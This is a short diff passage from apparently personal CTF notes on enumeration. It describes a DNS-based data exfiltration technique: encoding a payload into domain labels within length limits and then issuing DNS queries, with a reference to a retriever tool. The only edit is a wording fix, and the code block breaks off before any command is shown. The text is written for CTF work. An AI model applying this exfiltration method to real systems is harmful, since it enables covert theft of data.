welchbj/ctf/docs/enumeration.md

 * Each label (i.e., `www` and `company` from `www.company.com`) cannot exceed 63 characters
 * The total length of the domain cannot exceed 253 characters

 The below one-liners provide mechanisms of generating a `/tmp/resolveme` file that encodes the desired payload into a series of domains that use this basic protocol.
 The only step that remains after generating this file is to execute the DNS queries that create the exfiltration traffic.
-Take note that these one-liners also generate the session bytes inline; if space is a premium, you can do this offline and harcode it in the commands.
+Take note that these one-liners also generate the session bytes inline; if space is at a premium, you can do this offline and harcode it in the commands.
 Another implementation of the below snippets is that they provide a 5-character space for the sequence number; exfils involving larger sequences may have to adjust this logic.

 ```sh
 # python 2/3 file read with compression; use `./python3-dns-bin-retriever -d zlib -t TOKEN` to retrieve this